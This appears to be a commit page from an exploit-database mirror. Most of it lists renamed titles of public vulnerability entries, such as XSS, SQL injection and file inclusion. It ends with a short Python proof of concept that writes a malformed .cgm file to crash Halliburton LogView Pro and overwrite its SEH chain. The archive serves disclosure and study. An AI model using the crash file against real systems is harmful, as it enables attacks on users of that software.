Unijimpe Captcha 'captchademo.php' Cross-Site Scripting
Artiphp 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities
PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities

Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting
Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting
phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting
RuubikCMS 1.1.x - Cross Site Scripting / Information Disclosure / Directory Traversal
phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting
RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal

AZ Photo Album - Cross Site Scripting / Arbitrary File Upload
AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload

Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Inclusion
Nilehoster Topics Viewer 2.3 - Multiple SQL Injection and Local File Inclusion

AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities
AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities

WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF
WHMCompleteSolution (WHMCS) 5.0 - Multiple Application Function CSRF

VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross Site Scripting
VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting

WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities
WeBid Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities

Koha 3.20.1 - Multiple XSS and XSRF Vulnerabilities
Koha 3.20.1 - Multiple XSS / XSRF Vulnerabilities
XAMPP for Windows 1.7.7 - Multiple Cross Site Scripting / SQL Injection
SPIP 2.x Multiple Cross Site Scripting Vulnerabilities
XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection
SPIP 2.x Multiple Cross-Site Scripting Vulnerabilities

Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross Site Scripting
Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross-Site Scripting

MediaWiki 1.x - 'uselang' Parameter Cross Site Scripting
MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting
Simple Document Management System 1.1.5 Multiple SQL Injection
Webify Multiple Products - Multiple HTML Injection and Local File Inclusion
Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities
Simple Document Management System 1.1.5 - Multiple SQL Injection
Webify Multiple Products - Multiple HTML Injection / Local File Inclusion
Squiz CMS Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities

Mahara 1.4.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Mahara 1.4.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

Flogr 'tag' Parameter Multiple Cross Site Scripting Vulnerabilities
Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities

CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities
CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities

AdaptCMS 2.0.2 - 'index.php' Script Cross Site Scripting
AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting
web@all Cross Site Scripting
Commentics 'index.php' Cross Site Scripting
web@all Cross-Site Scripting
Commentics 'index.php' Cross-Site Scripting

Adiscan LogAnalyzer 3.4.3 Cross Site Scripting
Adiscan LogAnalyzer 3.4.3 Cross-Site Scripting

CMS Lokomedia Multiple Cross Site Scripting and HTML Injection Vulnerabilities
CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Phonalisa Multiple HTML-Injection Cross-Site Scripting
Phonalisa - Multiple HTML-Injection Cross-Site Scripting

FCKEditor Core - (Editor 'spellchecker.php') Cross Site Scripting
FCKEditor Core - (Editor 'spellchecker.php') Cross-Site Scripting

TEMENOS T24 Multiple Cross Site Scripting Vulnerabilities
TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities

SWFUpload 'movieName' Parameter Cross Site Scripting
SWFUpload 'movieName' Parameter Cross-Site Scripting

Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities
Joomla 2.5.x Language Switcher ModuleMultiple Cross-Site Scripting Vulnerabilities

php MBB Cross Site Scripting and SQL Injection
php MBB Cross-Site Scripting and SQL Injection
WordPress SocialFit Plugin 'msg' Parameter Cross Site Scripting
WordPress custom tables Plugin 'key' Parameter Cross Site Scripting
WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting
WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting
WordPress Knews Multilingual Newsletters Plugin Cross Site Scripting
WordPress PHPFreeChat 'url' Parameter Cross Site Scripting
WordPress Knews Multilingual Newsletters Plugin Cross-Site Scripting
WordPress PHPFreeChat 'url' Parameter Cross-Site Scripting

MGB Multiple Cross Site Scripting and SQL Injection
MGB - Multiple Cross-Site Scripting / SQL Injection

Funeral Script PHP Cross Site Scripting and SQL Injection
Funeral Script PHP Cross-Site Scripting and SQL Injection

Simple Machines 2.0.2 Multiple HTML Injection Vulnerabilities
Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities

web@all 'name' Parameter Cross Site Scripting
web@all 'name' Parameter Cross-Site Scripting

REDAXO 'subpage' Parameter Cross Site Scripting
REDAXO 'subpage' Parameter Cross-Site Scripting

Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities
Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities
phpBB Multiple SQL Injection
JW Player 'playerready' Parameter Cross Site Scripting
phpBB - Multiple SQL Injection
JW Player 'playerready' Parameter Cross-Site Scripting
Distimo Monitor Multiple Cross Site Scripting Vulnerabilities
ManageEngine Applications Manager Multiple Cross Site Scripting and SQL Injection
Distimo Monitor Multiple Cross-Site Scripting Vulnerabilities
ManageEngine Applications Manager Multiple Cross-Site Scripting and SQL Injection

ntop 'arbfile' Parameter Cross Site Scripting
ntop 'arbfile' Parameter Cross-Site Scripting
Zenoss 3.2.1 Multiple Security Vulnerabilities
Elefant CMS 'id' Parameter Cross Site Scripting
Worksforweb iAuto - Multiple Cross Site Scripting / HTML Injection Vulnerabilities
Zenoss 3.2.1 - Multiple Security Vulnerabilities
Elefant CMS 'id' Parameter Cross-Site Scripting
Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting
PolarisCMS 'WebForm_OnSubmit()' Function Cross-Site Scripting

ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
ConcourseSuite Multiple Cross-Site Scripting and Cross Site Request Forgery Vulnerabilities

Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Hotel Booking Portal 0.1 - Multiple SQL Injection / Cross-Site Scripting
Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities
mIRC 'projects.php' Cross Site Scripting
MindTouch DekiWiki Multiple Remote and Local File Inclusion
Total Shop UK eCommerce CodeIgniter Multiple Cross-Site Scripting Vulnerabilities
mIRC 'projects.php' Cross-Site Scripting
MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion

ShopperPress WordPress Theme - SQL Injection / Cross Site Scripting
ShopperPress WordPress Theme - SQL Injection / Cross-Site Scripting

LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting
LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting
JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting
SaltOS 'download.php' Cross Site Scripting
IBM Rational ClearQuest 8.0 Multiple Security Vulnerabilities
Jara 1.6 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities
OrderSys 1.6.4 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities
Banana Dance Cross Site Scripting and SQL Injection
JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting
SaltOS 'download.php' Cross-Site Scripting
IBM Rational ClearQuest 8.0 - Multiple Security Vulnerabilities
Jara 1.6 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities
OrderSys 1.6.4 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities
Banana Dance - Cross-Site Scripting / SQL Injection

SiNG cms 'password.php' Cross Site Scripting
SiNG cms 'password.php' Cross-Site Scripting
Monstra Multiple HTML Injection Vulnerabilities
KindEditor 'name' Parameter Cross Site Scripting
Monstra - Multiple HTML Injection Vulnerabilities
KindEditor 'name' Parameter Cross-Site Scripting
Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities
JW Player 'logo.link' Parameter Cross Site Scripting
Websense Content Gateway Multiple Cross-Site Scripting Vulnerabilities
JW Player 'logo.link' Parameter Cross-Site Scripting
Power-eCommerce Multiple Cross Site Scripting Vulnerabilities
WordPress Finder 'order' Parameter Cross Site Scripting
Power-eCommerce Multiple Cross-Site Scripting Vulnerabilities
WordPress Finder 'order' Parameter Cross-Site Scripting
LibGuides Multiple Cross Site Scripting Vulnerabilities
Mihalism Multi Host 'users.php' Cross Site Scripting
LibGuides Multiple Cross-Site Scripting Vulnerabilities
Mihalism Multi Host 'users.php' Cross-Site Scripting
Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities
PrestaShop 1.4.7 Multiple Cross Site Scripting Vulnerabilities
Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities
PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities

TomatoCart 'example_form.ajax.php' Cross Site Scripting
TomatoCart 'example_form.ajax.php' Cross-Site Scripting

Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities
Crowbar 'file' Parameter Multiple Cross-Site Scripting Vulnerabilities
phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities
Kayako Fusion 'download.php' Cross Site Scripting
phpFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities
Kayako Fusion 'download.php' Cross-Site Scripting

Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage
Hawkeye-G 3.0.1.4912 - Persistent XSS / Information Leakage
LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting
WordPress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities
LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting
WordPress Slideshow Plugin Multiple Cross-Site Scripting Vulnerabilities

Printer Pro 5.4.3 IOS - Persistent Cross Site Scripting
Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting

Flogr 'index.php' Multiple Cross Site Scripting Vulnerabilities
Flogr 'index.php' Multiple Cross-Site Scripting Vulnerabilities

ExtCalendar 2.0 Multiple SQL Injection and HTML Injection Vulnerabilities
ExtCalendar 2.0 - Multiple SQL Injection and HTML Injection Vulnerabilities

WordPress Download Monitor Plugin 'dlsearch' Parameter Cross Site Scripting
WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting

Openfiler 2.3 Multiple Cross Site Scripting and Information Disclosure Vulnerabilities
Openfiler 2.3 - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities

Atlassian Confluence 3.4.x Error Page Cross Site Scripting
Atlassian Confluence 3.4.x Error Page Cross-Site Scripting

vBSEO 'u' parameter Cross Site Scripting
vBSEO 'u' parameter Cross-Site Scripting

minimal Gallery 'index.php' Multiple Cross Site Scripting Vulnerabilities
minimal Gallery 'index.php' Multiple Cross-Site Scripting Vulnerabilities

AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities
AxisInternet VoIP Manager Multiple Cross-Site Scripting Vulnerabilities
WordPress Purity Theme Multiple Cross Site Scripting Vulnerabilities
Poweradmin 'index.php' Cross Site Scripting
WordPress MF Gig Calendar Plugin Cross Site Scripting
WordPress Purity Theme Multiple Cross-Site Scripting Vulnerabilities
Poweradmin 'index.php' Cross-Site Scripting
WordPress MF Gig Calendar Plugin Cross-Site Scripting

WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting
WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting

YCommerce Multiple SQL Injection
YCommerce - Multiple SQL Injection

WordPress Token Manager Plugin 'tid' Parameter Cross Site Scripting
WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting

Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross Site Scripting
Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross-Site Scripting

WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting
WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting
WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities
Zenphoto 'admin-news-articles.php' Cross Site Scripting
WordPress Akismet Plugin Multiple Cross-Site Scripting Vulnerabilities
Zenphoto 'admin-news-articles.php' Cross-Site Scripting

Interspire Email Marketer - (Cross Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities
Interspire Email Marketer - (Cross-Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities

CMS Mini 0.2.2 - 'index.php' Script Cross Site Scripting
CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting

WordPress Wordfence Security Plugin Cross Site Scripting
WordPress Wordfence Security Plugin Cross-Site Scripting
SMF 'view' Parameter Cross Site Scripting
Inventory Multiple Cross Site Scripting and SQL Injection
SMF 'view' Parameter Cross-Site Scripting
Inventory Multiple Cross-Site Scripting and SQL Injection

Gramophone 'rs' Parameter Cross Site Scripting
Gramophone 'rs' Parameter Cross-Site Scripting
WANem Multiple Cross Site Scripting Vulnerabilities
CorePlayer 'callback' Parameter Cross Site Scripting
WANem Multiple Cross-Site Scripting Vulnerabilities
CorePlayer 'callback' Parameter Cross-Site Scripting
NetCat CMS Multiple Cross Site Scripting Vulnerabilities
SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting
NetCat CMS Multiple Cross-Site Scripting Vulnerabilities
SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross-Site Scripting

bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities
bloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities

WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass
WebKit Cross-Site Scripting Filter 'XSSAuditor.cpp' Security Bypass
Elastix 'page' Parameter Cross Site Scripting
TinyMCPUK 'test' Parameter Cross Site Scripting
Elastix 'page' Parameter Cross-Site Scripting
TinyMCPUK 'test' Parameter Cross-Site Scripting

Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities
Multiple Fortinet FortiWeb Appliances Multiple Cross-Site Scripting Vulnerabilities

PHP Address Book 'group' Parameter Cross Site Scripting
PHP Address Book 'group' Parameter Cross-Site Scripting

cPanel 'account' Parameter Cross Site Scripting
cPanel 'account' Parameter Cross-Site Scripting
WHM 'filtername' Parameter Cross Site Scripting
cPanel 'dir' Parameter Cross Site Scripting
WHM 'filtername' Parameter Cross-Site Scripting
cPanel 'dir' Parameter Cross-Site Scripting
Joomla! Incapsula Component Multiple Cross Site Scripting Vulnerabilities
WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross Site Scripting
Joomla! Incapsula Component Multiple Cross-Site Scripting Vulnerabilities
WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting

Dell OpenManage Server Administrator Cross Site Scripting
Dell OpenManage Server Administrator Cross-Site Scripting

Quick.Cms/Quick.Cart Cross Site Scripting
Quick.Cms/Quick.Cart Cross-Site Scripting
Apache OFBiz 10.4.x Multiple Cross Site Scripting Vulnerabilities
Scripts Genie Classified Ultra - SQL Injection / Cross Site Scripting
Apache OFBiz 10.4.x Multiple Cross-Site Scripting Vulnerabilities
Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting
Perforce P4Web Multiple Cross Site Scripting Vulnerabilities
gpEasy CMS 'section' Parameter Cross Site Scripting
Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
gpEasy CMS 'section' Parameter Cross-Site Scripting
Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities
WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting
Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities
WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting

WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross Site Scripting
WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting
WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting
WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting
WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting
WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting

AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities
AbanteCart 'index.php' Multiple Cross-Site Scripting Vulnerabilities

Sonar Multiple Cross Site Scripting Vulnerabilities
Sonar Multiple Cross-Site Scripting Vulnerabilities

MIMEsweeper For SMTP Multiple Cross Site Scripting Vulnerabilities
MIMEsweeper For SMTP Multiple Cross-Site Scripting Vulnerabilities

Squirrelcart 'table' Parameter Cross Site Scripting
Squirrelcart 'table' Parameter Cross-Site Scripting

CKEditor 'posteddata.php' Cross Site Scripting
CKEditor 'posteddata.php' Cross-Site Scripting

WordPress Pretty Link Plugin Cross Site Scripting
WordPress Pretty Link Plugin Cross-Site Scripting
Zenphoto 'index.php' SQL Injection
PHPmyGallery 1.5 - Local File Disclosure / Cross Site Scripting
OpenEMR 'site' Parameter Cross Site Scripting
ZeroClipboard 1.9.x - 'id' Parameter Cross Site Scripting
Zenphoto - 'index.php' SQL Injection
PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting
OpenEMR 'site' Parameter Cross-Site Scripting
ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting
WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross Site Scripting Vulnerabilities
Batavi 'index.php' Cross Site Scripting
WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities
Batavi 'index.php' Cross-Site Scripting
JForum 'jforum.page' Multiple Cross Site Scripting Vulnerabilities
Geeklog Cross Site Scripting
JForum 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities
Geeklog Cross-Site Scripting

WordPress Uploader Plugin 'blog' Parameter Cross Site Scripting
WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting
HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting
WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting
HP Intelligent Management Center 'topoContent.jsf' Cross-Site Scripting
WordPress Count Per Day Plugin 'daytoshow' Parameter Cross-Site Scripting
Your Own Classifieds Cross Site Scripting
McAfee Vulnerability Manager - 'cert_cn' Parameter Cross Site Scripting
Your Own Classifieds Cross-Site Scripting
McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting
SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities
Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting
WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting
SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities
Asteriskguru Queue Statistics 'warning' Parameter Cross-Site Scripting
WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting

Petite Annonce Cross Site Scripting
Petite Annonce Cross-Site Scripting

WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting
WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross-Site Scripting

Jaow CMS 'add_ons' Parameter Cross Site Scripting
Jaow CMS 'add_ons' Parameter Cross-Site Scripting
IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross Site Scripting Vulnerabilities
OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities
WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting
C2 WebResource 'File' Parameter Cross Site Scripting
e107 - 'content_preset.php' Cross Site Scripting
IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities
OrionDB Web Directory Multiple Cross-Site Scripting Vulnerabilities
WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting
C2 WebResource 'File' Parameter Cross-Site Scripting
e107 - 'content_preset.php' Cross-Site Scripting

Zimbra 'aspell.php' Cross Site Scripting
Zimbra 'aspell.php' Cross-Site Scripting
WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting
phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities
WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting
phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities

Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution
Dream CMS 2.3.0 - CSRF Add Extension / File Upload PHP Code Execution

jPlayer 'Jplayer.swf' Script Cross Site Scripting
jPlayer 'Jplayer.swf' Script Cross-Site Scripting

Matrix42 Service Store 'default.aspx' Cross Site Scripting
Matrix42 Service Store 'default.aspx' Cross-Site Scripting

Crafty Syntax Live Help 3.1.2 - Remote File Inclusion and Path Disclosure
Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Path Disclosure

RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities
RealtyScript 4.0.2 - Multiple CSRF / Persistent XSS Vulnerabilities

Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS
Cisco Linksys E4200 /apply.cgi - Multiple Parameter XSS
MyBB Game Section Plugin 'games.php' Multiple Cross Site Scripting Vulnerabilities
Securimage 'example_form.php' Cross Site Scripting
WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting
MyBB Game Section Plugin 'games.php' Multiple Cross-Site Scripting Vulnerabilities
Securimage 'example_form.php' Cross-Site Scripting
WordPress Securimage-WP Plugin 'siwp_test.php' Cross-Site Scripting

Jojo CMS 'search' Parameter Cross Site Scripting
Jojo CMS 'search' Parameter Cross-Site Scripting
Elastix Multiple Cross Site Scripting Vulnerabilities
Telaen 2.7.x Cross Site Scripting
Elastix Multiple Cross-Site Scripting Vulnerabilities
Telaen 2.7.x Cross-Site Scripting

WordPress Ambience Theme 'src' Parameter Cross Site Scripting
WordPress Ambience Theme 'src' Parameter Cross-Site Scripting

Xaraya Multiple Cross Site Scripting Vulnerabilities
Xaraya - Multiple Cross-Site Scripting Vulnerabilities

Nameko 'nameko.php' Cross Site Scripting
Nameko 'nameko.php' Cross-Site Scripting

Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross Site Scripting
Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting

WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross Site Scripting
WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross-Site Scripting

WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross Site Scripting
WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting

Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross Site Scripting
Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting
Mintboard Multiple Cross Site Scripting Vulnerabilities
miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities
Mintboard Multiple Cross-Site Scripting Vulnerabilities
miniBB SQL Injection and Multiple Cross-Site Scripting Vulnerabilities

WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities
WordPress Pie Register Plugin 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities

Corda .NET Redirector 'redirector.corda' Cross Site Scripting
Corda .NET Redirector 'redirector.corda' Cross-Site Scripting

Apache Struts 2.2.3 Multiple Open Redirection Vulnerabilities
Apache Struts 2.2.3 - Multiple Open Redirection Vulnerabilities

YardRadius Multiple Local Format String Vulnerabilities
YardRadius - Multiple Local Format String Vulnerabilities
WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting
Magnolia CMS Multiple Cross Site Scripting Vulnerabilities
WordPress Duplicator Plugin Cross Site Scripting
WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting
Magnolia CMS Multiple Cross-Site Scripting Vulnerabilities
WordPress Duplicator Plugin Cross-Site Scripting

AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities
AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities

AlgoSec Firewall Analyzer Cross Site Scripting
AlgoSec Firewall Analyzer Cross-Site Scripting

DotNetNuke 6.1.x Cross Site Scripting
DotNetNuke 6.1.x Cross-Site Scripting

Bo-Blog 2.1.1 Cross Site Scripting and SQL Injection
Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection

Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting
Netwin SurgeFTP Sever 23d6 - Stored Cross-Site Scripting

Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access
Oracle Glassfish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access

Bugzilla 'editflagtypes.cgi' Multiple Cross Site Scripting Vulnerabilities
Bugzilla 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities

Course Registration Management System Cross Site Scripting and SQL Injection
Course Registration Management System Cross-Site Scripting and SQL Injection

WordPress Plugin WP Easy Poll 1.1.3 - XSS and CSRF
WordPress Plugin WP Easy Poll 1.1.3 - XSS / CSRF

Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection
Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection

Rhino Cross Site Scripting and Password Reset Security Bypass Vulnerabilities
Rhino Cross-Site Scripting and Password Reset Security Bypass Vulnerabilities

Maian Uploader 4.0 Multiple Security Vulnerabilities
Maian Uploader 4.0 - Multiple Security Vulnerabilities

Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross Site Scripting
Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross-Site Scripting

ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities
ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access
Xangati /servlet/MGConfigData - Multiple Parameter Remote Path Traversal File Access

ZamFoo Multiple Remote Command Execution Vulnerabilities
ZamFoo - Multiple Remote Command Execution Vulnerabilities

WordPress DZS-VideoGallery Plugin - Cross Site Scripting / Command Injection
WordPress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (1)
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (2)

Chamilo LMS - Persistent Cross Site Scripting
Chamilo LMS - Persistent Cross-Site Scripting

WordPress Site Import Plugin 1.0.1 - Local and Remote File Inclusion
WordPress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion

PHP 5.5.33 / <= 7.0.4 - SNMP Format String Exploit
PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit

CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning
CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning

ImageMagick 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)
ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)

ImageMagick 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)
ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)

Windows - Functional Keylogger to File Null Free Shellcode  (601 (0x0259) bytes)
Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)

iBilling 3.7.0 - Stored and Reflected XSS
iBilling 3.7.0 - Stored XSS / Reflected XSS

CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR bypass)
CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR Bypass)
WordPress Booking Calendar Plugin 6.2 - SQL Injection
WordPress WP Live Chat Support Plugin 6.2.03 - Stored XSS
WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) CSRF
Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC
2016-08-02 05:08:00 +00:00

26 lines
641 B
Python
Executable file
Raw Blame History

# Exploit Title: [Haliburton LogView Pro v9.7.5]
# Exploit Author: [Karn Ganeshen]
# Download link: [http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe]
# Version: [Current version 9.7.5]
# Tested on: [Windows Vista Ultimate SP2]
#
# Open cgm/tif/tiff/tifh file -> program crash -> SEH overwritten
#
# SEH chain of main thread
# Address SE handler
# 0012D22C kernel32.76B6FEF9
# 0012D8CC 42424242
# 41414141 *** CORRUPT ENTRY ***
#
#!/usr/bin/python
file="evil.cgm"
buffer = "A"*804 + "B"*4
file = open(file, 'w')
file.write(buffer)
file.close()
# +++++
Reference in a new issue View git blame Copy permalink